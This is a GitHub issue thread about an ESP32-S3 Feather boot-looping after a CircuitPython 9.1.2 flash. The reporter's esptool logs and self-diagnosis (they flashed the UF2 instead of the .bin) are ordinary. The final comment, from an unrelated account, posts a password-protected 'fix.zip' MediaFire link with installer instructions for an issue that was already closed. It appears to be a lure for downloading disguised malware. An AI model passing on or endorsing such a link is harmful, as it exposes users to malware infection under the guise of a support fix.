adafruit/circuitpython #9567: ESP32-S3 Feather Boot Loop after installing 9.1.2

DJDevon3, 2024-08-28:
### CircuitPython version

```python
Attempted update from 8.0.4 to 9.1.2.
```

### Code/REPL

```python
C:\Users\Devon\Downloads>esptool.py --chip esp32s3 erase_flash
esptool.py v4.6.2
Found 2 serial ports
Serial port COM3
Connecting...
Chip is ESP32-S3 (revision v0.1)
Features: WiFi, BLE
Crystal is 40MHz
MAC: xxx
Uploading stub...
Running stub...
Stub running...
Erasing flash (this may take a while)...
Chip erase completed successfully in 19.4s
Hard resetting via RTS pin...

C:\Users\Devon\Downloads>esptool.py --port COM3 write_flash -z 0x0 adafruit-circuitpython-adafruit_feather_esp32s3_4mbflash_2mbpsram-en_US-9.1.2.uf2
esptool.py v4.6.2
Serial port COM3
Connecting...
Detecting chip type... ESP32-S3
Chip is ESP32-S3 (revision v0.1)
Features: WiFi, BLE
Crystal is 40MHz
MAC: xxx
Uploading stub...
Running stub...
Stub running...
Configuring flash size...
Flash will be erased from 0x00000000 to 0x002a2fff...
Compressed 2762240 bytes to 1016624...
Wrote 2762240 bytes (1016624 compressed) at 0x00000000 in 33.4 seconds (effective 662.6 kbit/s)...
Hash of data verified.

Leaving...
Hard resetting via RTS pin...
--------------------- boot loop occurred here -----------------

C:\Users\Devon\Downloads>esptool.py --chip esp32s3 erase_flash
esptool.py v4.6.2
Found 2 serial ports
Serial port COM3
Connecting...
Chip is ESP32-S3 (revision v0.1)
Features: WiFi, BLE
Crystal is 40MHz
MAC: xxx
Uploading stub...
Running stub...
Stub running...
Erasing flash (this may take a while)...
Chip erase completed successfully in 19.1s
Hard resetting via RTS pin...

C:\Users\Devon\Downloads>esptool.py --port COM3 write_flash -z 0x0 adafruit-circuitpython-adafruit_feather_esp32s3_4mbflash_2mbpsram-en_US-9.0.4.bin
esptool.py v4.6.2
Serial port COM3
Connecting...
Detecting chip type... ESP32-S3
Chip is ESP32-S3 (revision v0.1)
Features: WiFi, BLE
Crystal is 40MHz
MAC: xxx
Uploading stub...
Running stub...
Stub running...
Configuring flash size...
Flash will be erased from 0x00000000 to 0x0014ffff...
Compressed 1376048 bytes to 931027...
Wrote 1376048 bytes (931027 compressed) at 0x00000000 in 18.4 seconds (effective 598.0 kbit/s)...
Hash of data verified.

Leaving...
Hard resetting via RTS pin...

After hard reset 9.0.4 brought up CircuitPy drive.
```

### Behavior

I first tried the Adafruit Web Serial ESPTool and it wouldn't connect to the board running 8.0.4
ESP Web Flasher loaded.
Connecting...
Connected successfully.
Try hard reset.
Chip type ESP32-S3
Connected to ESP32-S3
MAC Address: xxx
Uploading stub...
Running stub...
[Object.debug:191] Finished read loop
Error: Invalid head of packet (0x47)

After installing 9.1.2 with python esptool and hard resetting the board a boot loop occurs.  The COM port continually connects then disconnects. No CIRCUITPY device is shown. I tried every combination of boot/reset button combinations. Thankfully I could get it back to bootloader mode to flash down to 9.0.4 but a CIRCUITPY device never appeared due to the 9.1.2 boot loop.

9.0.4 bin works fine.

### Description

COM port boot looping

DJDevon3, 2024-08-28:
aaaand I just noticed I installed the UF2 instead of the bin.  disregard.

closed 2024-08-28 by DJDevon3

chenkeyu123, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."